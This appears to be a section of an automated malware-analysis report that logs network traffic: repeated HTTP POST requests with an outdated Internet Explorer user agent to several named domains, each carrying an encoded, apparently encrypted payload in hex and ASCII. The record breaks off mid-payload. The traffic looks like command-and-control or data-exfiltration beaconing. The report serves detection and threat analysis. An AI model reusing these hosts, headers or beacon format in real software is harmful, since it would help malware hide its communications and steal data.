              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.dayvo.comCache-Control: no-cacheData Raw: 2f 76 35 71 66 4d 4a 4d 6e 70 52 76 64 36 4e 2f 74 53 55 41 57 6b 57 50 31 6e 2f 53 58 30 45 43 46 6e 2b 58 79 57 78 66 73 47 37 6a 2b 46 52 69 7a 54 6b 42 4c 66 79 75 70 71 38 46 33 41 78 69 72 6b 39 58 45 6e 64 2b 39 77 6e 4b 38 6c 66 50 57 68 36 69 47 6c 78 46 4c 68 41 55 77 5a 52 30 65 43 78 4d 31 2b 57 71 4d 66 53 74 73 77 6e 59 6a 49 4f 73 39 36 64 53 42 70 72 53 70 75 4f 6a 73 31 77 2b 63 70 71 4b 5a 4f 73 4d 74 45 49 2f 64 53 6c 55 50 4b 76 6a 68 44 62 6f 43 44 59 63 76 79 49 66 4c 56 36 31 75 50 6b 44 35 5a 4a 62 4f 51 72 51 62 4c 42 4a 61 58 32 35 78 4d 6a 6e 6d 78 4f 58 76 35 78 46 75 38 4f 37 6f 43 79 35 77 35 6f 33 36 63 58 41 37 58 66 54 63 2f 45 75 63 43 55 4c 64 44 78 2b 55 2b 68 46 79 54 5a 59 77 33 73 38 53 56 50 6a 67 33 43 2f 76 38 6e 6d 52 76 33 4f 6d 74 74 75 73 42 46 68 2b 31 51 4a 74 4d 2b 31 47 4b 52 49 72 6f 51 4c 74 4a 42 37 4d 2f 52 31 38 6c 34 38 41 6b 52 6c 61 5a 38 55 71 38 6d 61 65 73 78 5a 50 46 6f 58 38 2f 50 58 41 71 66 42 4c 74 35 32 77 30 31 63 6e 64 63 39 4e 48 6b 77 33 61 79 65 4d 72 4b 32 46 69 33 71 67 42 6c 56 75 58 6b 46 65 79 45 2f 49 73 53 7a 49 4d 2f 73 71 4e 70 44 7a 45 2b 6c 67 35 74 46 2f 62 6d 2f 4d 71 71 6e 51 6a 67 75 4d 4a 2b 46 61 4f 2f 70 34 65 6e 70 54 62 62 54 66 73 33 73 69 47 30 76 52 6e 5a 49 55 39 4f 71 56 33 30 4a 46 4c 73 63 47 35 47 41 4d 55 71 38 34 4c 47 71 4d 54 63 44 2f 59 33 6a 67 6c 47 31 79 65 75 4d 34 6f 6e 7a 39 6a 2f 73 6e 64 59 39 4c 7a 4e 49 38 76 6e 71 6a 6e 55 4a 66 4e 4e 6f 4d 46 34 30 79 44 73 57 45 78 38 34 4e 67 33 56 39 76 7a 59 4c 41 48 67 75 59 4f 4f 4c 44 6a 54 73 49 67 77 6f 58 69 48 36 62 37 33 50 44 62 69 72 58 36 74 2f 79 50 4e 53 75 4b 42 65 4b 70 39 39 69 37 46 64 55 79 35 6e 39 37 48 54 66 4d 3d Data Ascii: /v5qfMJMnpRvd6N/tSUAWkWP1n/SX0ECFn+XyWxfsG7j+FRizTkBLfyupq8F3Axirk9XEnd+9wnK8lfPWh6iGlxFLhAUwZR0eCxM1+WqMfStswnYjIOs96dSBprSpuOjs1w+cpqKZOsMtEI/dSlUPKvjhDboCDYcvyIfLV61uPkD5ZJbOQrQbLBJaX25xMjnmxOXv5xFu8O7oCy5w5o36cXA7XfTc/EucCULdDx+U+hFyTZYw3s8SVPjg3C/v8nmRv3OmttusBFh+1QJtM+1GKRIroQLtJB7M/R18l48AkRlaZ8Uq8maesxZPFoX8/PXAqfBLt52w01cndc9NHkw3ayeMrK2Fi3qgBlVuXkFeyE/IsSzIM/sqNpDzE+lg5tF/bm/MqqnQjguMJ+FaO/p4enpTbbTfs3siG0vRnZIU9OqV30JFLscG5GAMUq84LGqMTcD/Y3jglG1yeuM4onz9j/sndY9LzNI8vnqjnUJfNNoMF40yDsWEx84Ng3V9vzYLAHguYOOLDjTsIgwoXiH6b73PDbirX6t/yPNSuKBeKp99i7FdUy5n97HTfM=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 592User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.crcsi.orgCache-Control: no-cacheData Raw: 54 4c 52 35 65 2b 6c 45 6e 70 51 61 7a 67 51 41 75 45 6d 75 6b 67 4a 68 68 30 61 48 52 41 31 75 4c 54 37 74 61 31 52 47 35 7a 59 79 56 30 50 61 4e 7a 6a 78 73 51 73 78 38 7a 63 6d 4c 50 4c 30 34 62 71 70 69 78 50 63 78 47 47 42 64 38 61 71 5a 2f 6d 6e 57 6d 78 6b 75 4d 41 46 70 6b 42 72 4a 76 4c 42 74 66 59 4e 38 45 79 39 6e 73 7a 6c 37 4d 4b 38 64 59 65 39 6f 79 71 5a 4e 44 6c 54 63 43 6b 78 64 45 34 53 37 7a 6b 63 41 71 39 2f 35 38 67 71 75 65 56 58 4a 75 6c 62 4f 6e 32 35 63 72 64 7a 57 4f 4e 39 55 69 6f 76 31 6e 35 38 4d 7a 42 56 36 78 46 52 57 37 46 4c 57 42 7a 63 43 64 57 70 75 64 62 48 37 54 44 54 6e 50 74 45 6d 78 55 64 51 34 35 42 6a 66 70 42 52 4c 4e 63 49 50 50 5a 74 62 54 38 56 36 63 43 55 36 57 75 38 76 41 56 68 55 34 38 57 53 53 72 4f 69 4f 2b 50 69 68 44 30 45 59 57 41 62 41 66 38 66 4c 49 5a 55 4e 41 64 78 56 54 75 50 4b 33 62 32 67 56 6c 42 4e 6a 6c 30 34 69 38 75 37 74 44 5a 5a 51 68 31 58 6d 38 5a 7a 73 72 43 51 44 66 58 32 2f 70 77 43 66 61 59 4c 41 4d 36 47 55 63 56 52 78 4d 67 45 66 2b 6a 50 77 2f 35 61 52 43 34 6e 38 55 4b 41 39 37 35 47 34 39 51 43 33 38 67 38 4f 52 49 36 38 45 55 6d 4f 67 38 46 69 2f 62 56 78 4c 46 2f 74 76 4b 4d 66 61 36 6a 31 43 66 64 4c 63 52 41 39 2f 74 38 5a 47 33 37 35 53 6e 4a 4a 47 4e 2f 6a 77 58 57 74 2f 74 74 4b 2b 33 7a 36 72 73 34 59 48 72 72 46 64 70 50 70 43 6b 72 73 6d 6f 4e 68 68 4f 31 44 4a 49 72 34 7a 30 6c 78 36 32 46 66 71 79 49 66 44 37 33 6f 5a 79 38 77 34 53 39 75 4d 71 41 48 53 48 64 6e 42 42 45 48 30 55 72 61 6f 61 38 58 56 7a 50 67 78 68 33 63 32 4e 47 43 59 69 79 52 45 4d 72 41 76 34 36 4f 52 67 63 64 62 57 77 41 67 68 4b 64 64 45 70 69 67 72 4d 4b 70 59 74 68 42 6c 2b 70 4b 4b 74 31 42 51 44 2b 50 6e 2f 2b 69 72 6c 70 56 2f 7a 50 4a 5a 69 33 66 66 72 31 2b 75 38 49 4b 41 3d 3d Data Ascii: TLR5e+lEnpQazgQAuEmukgJhh0aHRA1uLT7ta1RG5zYyV0PaNzjxsQsx8zcmLPL04bqpixPcxGGBd8aqZ/mnWmxkuMAFpkBrJvLBtfYN8Ey9nszl7MK8dYe9oyqZNDlTcCkxdE4S7zkcAq9/58gqueVXJulbOn25crdzWON9Uiov1n58MzBV6xFRW7FLWBzcCdWpudbH7TDTnPtEmxUdQ45BjfpBRLNcIPPZtbT8V6cCU6Wu8vAVhU48WSSrOiO+PihD0EYWAbAf8fLIZUNAdxVTuPK3b2gVlBNjl04i8u7tDZZQh1Xm8ZzsrCQDfX2/pwCfaYLAM6GUcVRxMgEf+jPw/5aRC4n8UKA975G49QC38g8ORI68EUmOg8Fi/bVxLF/tvKMfa6j1CfdLcRA9/t8ZG375SnJJGN/jwXWt/ttK+3z6rs4YHrrFdpPpCkrsmoNhhO1DJIr4z0lx62FfqyIfD73oZy8w4S9uMqAHSHdnBBEH0Uraoa8XVzPgxh3c2NGCYiyREMrAv46ORgcdbWwAghKddEpigrMKpYthBl+pKKt1BQD+Pn/+irlpV/zPJZi3ffr1+u8IKA==
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.dayvo.comCache-Control: no-cacheData Raw: 2f 76 35 71 66 4d 4a 4d 6e 70 52 76 64 36 4e 2f 74 53 55 41 57 6b 57 50 31 6e 2f 53 58 30 45 43 46 6e 2b 58 79 57 78 66 73 47 37 6a 2b 46 52 69 7a 54 6b 42 4c 66 79 75 70 71 38 46 33 41 78 69 72 6b 39 58 45 6e 64 2b 39 77 6e 4b 38 6c 66 50 57 68 36 69 47 6c 78 46 4c 68 41 55 77 5a 52 30 65 43 78 4d 31 2b 57 71 4d 66 53 74 73 77 6e 59 6a 49 4f 73 39 36 64 53 42 70 72 53 70 75 4f 6a 73 31 77 2b 63 70 71 4b 5a 4f 73 4d 74 45 49 2f 64 53 6c 55 50 4b 76 6a 68 44 62 6f 43 44 59 63 76 79 49 66 4c 56 36 31 75 50 6b 44 35 5a 4a 62 4f 51 72 51 62 4c 42 4a 61 58 32 35 78 4d 6a 6e 6d 78 4f 58 76 35 78 46 75 38 4f 37 6f 43 79 35 77 35 6f 33 36 63 58 41 37 58 66 54 63 2f 45 75 63 43 55 4c 64 44 78 2b 55 2b 68 46 79 54 5a 59 77 33 73 38 53 56 50 6a 67 33 43 2f 76 38 6e 6d 52 76 33 4f 6d 74 74 75 73 42 46 68 2b 31 51 4a 74 4d 2b 31 47 4b 52 49 72 6f 51 4c 74 4a 42 37 4d 2f 52 31 38 6c 34 38 41 6b 52 6c 61 5a 38 55 71 38 6d 61 65 73 78 5a 50 46 6f 58 38 2f 50 58 41 71 66 42 4c 74 35 32 77 30 31 63 6e 64 63 39 4e 48 6b 77 33 61 79 65 4d 72 4b 32 46 69 33 71 67 42 6c 56 75 58 6b 46 65 79 45 2f 49 73 53 7a 49 4d 2f 73 71 4e 70 44 7a 45 2b 6c 67 35 74 46 2f 62 6d 2f 4d 71 71 6e 51 6a 67 75 4d 4a 2b 46 61 4f 2f 70 34 65 6e 70 54 62 62 54 66 73 33 73 69 47 30 76 52 6e 5a 49 55 39 4f 71 56 33 30 4a 46 4c 73 63 47 35 47 41 4d 55 71 38 34 4c 47 71 4d 54 63 44 2f 59 33 6a 67 6c 47 31 79 65 75 4d 34 6f 6e 7a 39 6a 2f 73 6e 64 59 39 4c 7a 4e 49 38 76 6e 71 6a 6e 55 4a 66 4e 4e 6f 4d 46 34 30 79 44 73 57 45 78 38 34 4e 67 33 56 39 76 7a 59 4c 41 48 67 75 59 4f 4f 4c 44 6a 54 73 49 67 77 6f 58 69 48 36 62 37 33 50 44 62 69 72 58 36 74 2f 79 50 4e 53 75 4b 42 65 4b 70 39 39 69 37 46 64 55 79 35 6e 39 37 48 54 66 4d 3d Data Ascii: /v5qfMJMnpRvd6N/tSUAWkWP1n/SX0ECFn+XyWxfsG7j+FRizTkBLfyupq8F3Axirk9XEnd+9wnK8lfPWh6iGlxFLhAUwZR0eCxM1+WqMfStswnYjIOs96dSBprSpuOjs1w+cpqKZOsMtEI/dSlUPKvjhDboCDYcvyIfLV61uPkD5ZJbOQrQbLBJaX25xMjnmxOXv5xFu8O7oCy5w5o36cXA7XfTc/EucCULdDx+U+hFyTZYw3s8SVPjg3C/v8nmRv3OmttusBFh+1QJtM+1GKRIroQLtJB7M/R18l48AkRlaZ8Uq8maesxZPFoX8/PXAqfBLt52w01cndc9NHkw3ayeMrK2Fi3qgBlVuXkFeyE/IsSzIM/sqNpDzE+lg5tF/bm/MqqnQjguMJ+FaO/p4enpTbbTfs3siG0vRnZIU9OqV30JFLscG5GAMUq84LGqMTcD/Y3jglG1yeuM4onz9j/sndY9LzNI8vnqjnUJfNNoMF40yDsWEx84Ng3V9vzYLAHguYOOLDjTsIgwoXiH6b73PDbirX6t/yPNSuKBeKp99i7FdUy5n97HTfM=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ex-olive.comCache-Control: no-cacheData Raw: 4e 63 4e 4f 65 34 5a 44 6e 70 52 42 59 67 47 4e 6f 63 56 31 62 36 6e 6d 58 68 50 6d 46 38 4e 62 47 74 6a 68 52 37 66 71 41 72 50 2f 52 4c 32 53 6d 6f 35 76 6e 53 73 4e 47 4e 45 72 63 30 59 4a 42 72 4b 63 7a 62 31 38 2f 37 39 55 41 4a 34 4b 6f 43 44 34 77 32 6a 70 76 2f 50 58 54 71 47 6e 59 50 2b 57 52 45 74 66 69 77 4f 4c 4e 67 55 6a 74 4a 70 30 51 56 6e 2f 49 66 76 6b 7a 33 41 6a 2b 53 74 58 50 4b 34 48 51 36 6e 48 4e 5a 69 63 37 6f 49 68 57 50 45 64 6f 59 4f 55 69 69 65 4c 79 34 45 2f 5a 32 70 6f 72 77 57 46 66 66 67 74 64 71 79 48 69 35 35 4f 57 70 6d 43 45 66 53 66 33 2b 4a 4d 32 6d 61 69 4a 39 6d 35 47 2b 72 6b 37 61 51 32 47 52 58 6c 53 46 52 67 37 43 42 44 6c 43 36 59 74 4e 4d 44 37 46 41 79 70 54 61 70 44 6c 6e 69 77 5a 4f 54 47 4e 36 6c 4d 4c 57 76 36 2f 4c 46 74 44 66 56 78 50 5a 4a 77 62 32 61 76 33 58 6e 42 37 73 51 58 78 34 31 6a 4d 57 53 78 35 51 54 65 58 2b 66 34 79 49 6b 53 37 54 62 53 54 62 5a 45 58 39 6d 70 49 59 50 6d 69 58 42 6d 39 36 6a 79 37 50 46 50 6f 4c 62 38 4f 61 72 36 4b 56 69 69 2f 56 55 6f 66 6a 33 73 54 64 47 33 69 35 31 59 35 47 57 7a 76 5a 57 32 6e 69 75 79 32 56 32 6a 67 46 4a 62 58 4a 70 62 4c 53 54 30 78 69 54 61 2b 50 32 7a 7a 39 69 77 4f 79 4b 39 6e 66 67 64 56 47 6d 6e 46 65 6a 37 49 6c 6a 33 50 6a 70 49 76 73 47 31 38 42 70 58 4e 31 51 37 61 38 2b 66 5a 66 4f 62 49 74 73 4f 68 47 36 63 4d 34 2b 69 59 70 76 72 6f 46 48 4f 30 67 50 76 42 69 63 58 55 54 45 62 31 48 57 79 36 4e 68 6e 45 54 37 50 68 6f 59 6c 43 53 37 6f 75 61 65 72 57 36 74 39 38 38 48 2b 41 30 44 69 61 50 51 50 6c 35 36 5a 36 67 2f 75 59 52 6b 78 46 70 4f 69 52 75 35 52 70 76 78 66 33 75 56 75 6f 56 31 45 34 42 56 4c 6a 4e 6d 56 4f 70 47 38 2f 52 78 Data Ascii: NcNOe4ZDnpRBYgGNocV1b6nmXhPmF8NbGtjhR7fqArP/RL2Smo5vnSsNGNErc0YJBrKczb18/79UAJ4KoCD4w2jpv/PXTqGnYP+WREtfiwOLNgUjtJp0QVn/Ifvkz3Aj+StXPK4HQ6nHNZic7oIhWPEdoYOUiieLy4E/Z2porwWFffgtdqyHi55OWpmCEfSf3+JM2maiJ9m5G+rk7aQ2GRXlSFRg7CBDlC6YtNMD7FAypTapDlniwZOTGN6lMLWv6/LFtDfVxPZJwb2av3XnB7sQXx41jMWSx5QTeX+f4yIkS7TbSTbZEX9mpIYPmiXBm96jy7PFPoLb8Oar6KVii/VUofj3sTdG3i51Y5GWzvZW2niuy2V2jgFJbXJpbLST0xiTa+P2zz9iwOyK9nfgdVGmnFej7Ilj3PjpIvsG18BpXN1Q7a8+fZfObItsOhG6cM4+iYpvroFHO0gPvBicXUTEb1HWy6NhnET7PhoYlCS7ouaerW6t988H+A0DiaPQPl56Z6g/uYRkxFpOiRu5Rpvxf3uVuoV1E4BVLjNmVOpG8/Rx
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ora-ito.comCache-Control: no-cacheData Raw: 35 51 49 69 55 42 4a 39 72 5a 52 4f 79 5a 36 72 78 58 6e 56 48 78 55 77 75 73 42 69 48 73 73 5a 5a 73 79 61 4c 48 45 72 56 66 69 72 33 32 61 4b 6e 34 39 43 32 64 57 72 62 47 70 58 51 38 72 2f 38 72 79 59 4c 30 41 78 4e 4d 67 74 4f 59 42 44 44 65 72 6a 35 47 74 33 49 75 56 66 7a 43 63 63 2f 6c 73 30 41 54 36 77 63 55 67 65 6d 54 74 2b 35 48 54 79 79 63 6d 32 31 74 48 47 33 76 6c 6e 4a 4e 75 56 55 48 72 47 59 2f 6f 4c 4d 2f 65 4a 4a 31 6b 35 31 34 2f 32 51 34 52 7a 38 49 6b 48 52 31 67 50 6f 78 43 7a 6a 4c 37 33 58 6a 48 47 68 61 32 53 7a 4d 79 75 69 39 48 70 6b 57 62 45 36 4a 50 69 2f 61 44 72 4b 34 6b 47 59 33 55 66 61 58 6b 48 2b 36 70 63 61 75 4b 45 50 4e 62 77 37 56 33 78 75 6c 4f 7a 46 30 48 72 34 4b 35 58 74 33 59 37 72 78 30 31 46 4d 43 55 47 50 75 31 32 52 69 51 55 34 68 69 58 51 4b 57 33 77 4a 6f 58 52 36 50 46 4f 4c 43 51 41 66 78 6b 59 48 44 51 38 52 4f 44 59 62 77 50 34 67 6e 35 58 33 78 42 53 69 33 63 6f 4c 43 33 75 65 70 35 61 76 2f 72 39 77 68 62 50 7a 43 4c 49 4f 75 49 4f 49 58 42 4d 4a 68 2b 54 4e 31 71 4d 7a 30 33 2f 4a 5a 74 33 52 47 41 57 72 49 4e 4c 67 70 59 2f 65 5a 4e 6e 51 6d 36 59 63 68 4b 58 69 6b 41 47 76 50 75 51 4c 73 2f 77 66 64 75 4c 64 30 43 5a 39 47 38 6d 73 41 4e 2b 66 37 42 79 78 42 72 61 38 54 56 41 65 58 35 6a 42 73 72 41 4f 75 32 54 51 79 46 59 71 55 35 4b 6b 59 35 2f 70 2b 4a 32 30 4e 75 6f 74 31 41 61 57 79 36 77 49 6d 4b 6b 65 4a 36 4d 47 63 32 72 45 76 36 4f 77 2b 41 79 63 4b 30 6e 53 36 66 6f 67 34 43 33 37 44 48 2f 6e 69 69 2f 4e 45 4d 69 5a 38 39 52 59 5a 52 35 66 66 35 30 50 55 2b 64 66 69 6f 46 6d 4a 6a 35 35 6c 75 49 49 71 73 30 64 6e 75 32 66 76 65 4d 53 49 42 62 33 30 4d 57 36 32 4a 51 45 39 6a 47 33 53 79 51 48 75 36 54 55 7a 32 64 49 64 Data Ascii: 5QIiUBJ9rZROyZ6rxXnVHxUwusBiHssZZsyaLHErVfir32aKn49C2dWrbGpXQ8r/8ryYL0AxNMgtOYBDDerj5Gt3IuVfzCcc/ls0AT6wcUgemTt+5HTyycm21tHG3vlnJNuVUHrGY/oLM/eJJ1k514/2Q4Rz8IkHR1gPoxCzjL73XjHGha2SzMyui9HpkWbE6JPi/aDrK4kGY3UfaXkH+6pcauKEPNbw7V3xulOzF0Hr4K5Xt3Y7rx01FMCUGPu12RiQU4hiXQKW3wJoXR6PFOLCQAfxkYHDQ8RODYbwP4gn5X3xBSi3coLC3uep5av/r9whbPzCLIOuIOIXBMJh+TN1qMz03/JZt3RGAWrINLgpY/eZNnQm6YchKXikAGvPuQLs/wfduLd0CZ9G8msAN+f7ByxBra8TVAeX5jBsrAOu2TQyFYqU5KkY5/p+J20Nuot1AaWy6wImKkeJ6MGc2rEv6Ow+AycK0nS6fog4C37DH/nii/NEMiZ89RYZR5ff50PU+dfioFmJj55luIIqs0dnu2fveMSIBb30MW62JQE9jG3SyQHu6TUz2dId
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.stajum.comCache-Control: no-cacheData Raw: 49 31 4f 48 54 77 6c 34 72 5a 53 53 65 36 62 6c 57 4b 48 79 6e 79 4b 68 37 39 55 6e 52 67 57 44 54 63 76 4c 64 53 2b 54 57 44 50 54 35 51 2b 70 52 47 67 46 46 4e 76 4f 6a 51 57 39 71 6f 30 72 33 4b 47 42 2b 4a 52 52 32 75 41 67 30 65 6d 6d 55 52 68 65 66 38 55 48 6a 70 4d 34 64 45 54 4e 30 36 57 49 6b 4b 41 78 78 35 37 4e 57 50 69 78 78 48 61 2b 77 58 31 2b 6c 48 49 34 75 68 6a 5a 4b 33 35 62 48 69 4c 44 6c 6e 57 74 70 50 44 70 30 49 76 36 66 35 54 4d 49 52 33 66 57 78 68 51 74 2b 42 6f 47 54 72 69 33 41 74 35 67 4c 62 51 76 4a 78 4f 35 35 42 4f 50 6a 6d 75 37 72 51 46 4b 32 2b 2f 51 64 50 52 71 58 4d 39 2b 45 35 55 38 49 49 5a 50 51 34 56 79 4c 42 58 6f 48 65 4c 57 35 61 73 78 44 48 58 53 6a 32 4c 74 65 64 53 2b 4b 55 63 78 68 58 61 58 58 50 50 33 57 50 4d 35 52 76 31 45 53 69 36 36 7a 4f 4b 4a 62 69 74 35 6a 6d 37 4d 35 69 39 4d 6a 56 66 39 6f 70 58 47 62 6d 4e 32 38 72 6e 6a 35 34 37 57 68 37 71 6f 78 51 6b 44 34 46 4b 7a 4a 33 4f 61 76 76 51 45 50 51 79 34 45 78 45 6e 6a 35 56 33 58 5a 6b 55 65 44 34 36 44 2b 33 65 66 45 4d 63 35 69 2b 7a 2b 65 56 59 63 76 46 6f 37 52 33 39 4b 62 47 66 32 59 50 39 43 6a 6e 34 44 79 4a 74 48 43 39 57 72 44 63 58 6f 52 2f 78 59 33 65 4d 41 68 38 30 49 74 30 71 36 61 42 2f 66 41 30 6c 54 62 74 66 59 63 64 49 31 48 32 2f 30 64 58 6b 35 75 79 54 4a 33 74 51 74 52 75 64 4e 41 77 76 55 6d 67 42 4f 31 36 4f 58 73 50 32 55 54 31 34 54 63 31 56 34 43 6d 58 69 5a 75 53 41 52 2f 48 39 30 51 32 44 62 37 53 36 72 4e 65 6b 56 34 61 30 4a 78 41 54 39 4c 4a 65 41 4e 71 69 6b 2b 5a 2f 47 73 61 77 66 65 53 59 70 46 64 58 44 6a 48 37 4b 4d 68 43 4c 38 62 4c 6b 6e 35 37 4d 42 50 4d 59 6e 31 6b 65 4d 56 68 41 6e 32 4a 4d 72 2f 7a 31 30 43 6c 37 55 6b 70 39 30 74 77 3d 3d Data Ascii: I1OHTwl4rZSSe6blWKHynyKh79UnRgWDTcvLdS+TWDPT5Q+pRGgFFNvOjQW9qo0r3KGB+JRR2uAg0emmURhef8UHjpM4dETN06WIkKAxx57NWPixxHa+wX1+lHI4uhjZK35bHiLDlnWtpPDp0Iv6f5TMIR3fWxhQt+BoGTri3At5gLbQvJxO55BOPjmu7rQFK2+/QdPRqXM9+E5U8IIZPQ4VyLBXoHeLW5asxDHXSj2LtedS+KUcxhXaXXPP3WPM5Rv1ESi66zOKJbit5jm7M5i9MjVf9opXGbmN28rnj547Wh7qoxQkD4FKzJ3OavvQEPQy4ExEnj5V3XZkUeD46D+3efEMc5i+z+eVYcvFo7R39KbGf2YP9Cjn4DyJtHC9WrDcXoR/xY3eMAh80It0q6aB/fA0lTbtfYcdI1H2/0dXk5uyTJ3tQtRudNAwvUmgBO16OXsP2UT14Tc1V4CmXiZuSAR/H90Q2Db7S6rNekV4a0JxAT9LJeANqik+Z/GsawfeSYpFdXDjH7KMhCL8bLkn57MBPMYn1keMVhAn2JMr/z10Cl7Ukp90tw==
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ora-ito.comCache-Control: no-cacheData Raw: 35 51 49 69 55 42 4a 39 72 5a 52 4f 79 5a 36 72 78 58 6e 56 48 78 55 77 75 73 42 69 48 73 73 5a 5a 73 79 61 4c 48 45 72 56 66 69 72 33 32 61 4b 6e 34 39 43 32 64 57 72 62 47 70 58 51 38 72 2f 38 72 79 59 4c 30 41 78 4e 4d 67 74 4f 59 42 44 44 65 72 6a 35 47 74 33 49 75 56 66 7a 43 63 63 2f 6c 73 30 41 54 36 77 63 55 67 65 6d 54 74 2b 35 48 54 79 79 63 6d 32 31 74 48 47 33 76 6c 6e 4a 4e 75 56 55 48 72 47 59 2f 6f 4c 4d 2f 65 4a 4a 31 6b 35 31 34 2f 32 51 34 52 7a 38 49 6b 48 52 31 67 50 6f 78 43 7a 6a 4c 37 33 58 6a 48 47 68 61 32 53 7a 4d 79 75 69 39 48 70 6b 57 62 45 36 4a 50 69 2f 61 44 72 4b 34 6b 47 59 33 55 66 61 58 6b 48 2b 36 70 63 61 75 4b 45 50 4e 62 77 37 56 33 78 75 6c 4f 7a 46 30 48 72 34 4b 35 58 74 33 59 37 72 78 30 31 46 4d 43 55 47 50 75 31 32 52 69 51 55 34 68 69 58 51 4b 57 33 77 4a 6f 58 52 36 50 46 4f 4c 43 51 41 66 78 6b 59 48 44 51 38 52 4f 44 59 62 77 50 34 67 6e 35 58 33 78 42 53 69 33 63 6f 4c 43 33 75 65 70 35 61 76 2f 72 39 77 68 62 50 7a 43 4c 49 4f 75 49 4f 49 58 42 4d 4a 68 2b 54 4e 31 71 4d 7a 30 33 2f 4a 5a 74 33 52 47 41 57 72 49 4e 4c 67 70 59 2f 65 5a 4e 6e 51 6d 36 59 63 68 4b 58 69 6b 41 47 76 50 75 51 4c 73 2f 77 66 64 75 4c 64 30 43 5a 39 47 38 6d 73 41 4e 2b 66 37 42 79 78 42 72 61 38 54 56 41 65 58 35 6a 42 73 72 41 4f 75 32 54 51 79 46 59 71 55 35 4b 6b 59 35 2f 70 2b 4a 32 30 4e 75 6f 74 31 41 61 57 79 36 77 49 6d 4b 6b 65 4a 36 4d 47 63 32 72 45 76 36 4f 77 2b 41 79 63 4b 30 6e 53 36 66 6f 67 34 43 33 37 44 48 2f 6e 69 69 2f 4e 45 4d 69 5a 38 39 52 59 5a 52 35 66 66 35 30 50 55 2b 64 66 69 6f 46 6d 4a 6a 35 35 6c 75 49 49 71 73 30 64 6e 75 32 66 76 65 4d 53 49 42 62 33 30 4d 57 36 32 4a 51 45 39 6a 47 33 53 79 51 48 75 36 54 55 7a 32 64 49 64 Data Ascii: 5QIiUBJ9rZROyZ6rxXnVHxUwusBiHssZZsyaLHErVfir32aKn49C2dWrbGpXQ8r/8ryYL0AxNMgtOYBDDerj5Gt3IuVfzCcc/ls0AT6wcUgemTt+5HTyycm21tHG3vlnJNuVUHrGY/oLM/eJJ1k514/2Q4Rz8IkHR1gPoxCzjL73XjHGha2SzMyui9HpkWbE6JPi/aDrK4kGY3UfaXkH+6pcauKEPNbw7V3xulOzF0Hr4K5Xt3Y7rx01FMCUGPu12RiQU4hiXQKW3wJoXR6PFOLCQAfxkYHDQ8RODYbwP4gn5X3xBSi3coLC3uep5av/r9whbPzCLIOuIOIXBMJh+TN1qMz03/JZt3RGAWrINLgpY/eZNnQm6YchKXikAGvPuQLs/wfduLd0CZ9G8msAN+f7ByxBra8TVAeX5jBsrAOu2TQyFYqU5KkY5/p+J20Nuot1AaWy6wImKkeJ6MGc2rEv6Ow+AycK0nS6fog4C37DH/nii/NEMiZ89RYZR5ff50PU+dfioFmJj55luIIqs0dnu2fveMSIBb30MW62JQE9jG3SyQHu6TUz2dId
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.tyrns.comCache-Control: no-cacheCookie: ASP.NET_SessionId=3xsqu35503je1m45iqk44avwData Raw: 63 67 48 61 67 46 52 69 74 35 51 4c 6c 76 36 67 4c 32 6b 67 64 61 64 41 46 6d 72 4d 45 56 51 41 79 48 52 46 7a 72 59 30 43 51 66 66 73 56 68 32 6e 6e 72 4d 4d 57 7a 4b 67 6d 54 53 72 6a 54 2b 77 6d 2f 43 58 70 73 4c 45 70 38 59 4f 68 49 71 72 4b 50 64 65 66 52 6e 45 33 79 76 4c 61 4e 48 65 34 68 46 6a 37 72 74 67 36 46 7a 50 61 48 64 6e 78 49 6e 75 6b 59 57 43 45 2f 6f 6e 78 2b 71 57 49 48 57 6b 53 56 41 6f 50 36 67 67 32 56 78 36 4e 65 44 49 59 6a 6f 45 31 56 78 74 42 45 79 32 67 43 72 4e 72 54 36 44 42 46 6a 4f 2b 66 74 48 50 42 59 5a 6a 6a 31 56 76 37 41 43 2b 47 61 58 39 41 66 49 4a 4b 6e 58 6f 6d 4c 58 73 78 42 68 69 61 56 64 36 42 55 58 6c 69 58 41 68 6b 31 59 4c 4c 59 77 48 65 76 65 65 6a 57 47 72 76 2f 2f 71 4a 6e 73 38 30 56 64 55 61 31 75 50 74 54 49 50 45 61 62 76 77 56 6f 4a 78 71 4f 68 6f 53 71 7a 69 2f 34 44 53 63 66 4d 69 38 72 64 68 70 6e 76 6d 39 4a 32 79 6e 65 41 4f 65 6d 76 6e 64 61 36 76 35 38 7a 5a 47 2b 62 41 4d 6a 32 2b 4f 35 34 4d 6e 30 5a 52 6c 74 6f 6e 45 46 6c 31 6f 57 33 45 66 57 4d 4b 37 78 77 67 44 64 2f 75 69 70 43 61 70 51 77 4e 66 79 46 66 73 4f 79 69 34 52 77 67 71 33 52 47 58 46 51 35 43 4e 6a 76 54 30 50 68 6e 71 65 69 62 51 58 38 7a 55 79 30 37 77 75 77 55 71 46 59 44 2f 6d 35 59 71 63 61 76 46 69 4a 50 56 72 45 64 67 53 6c 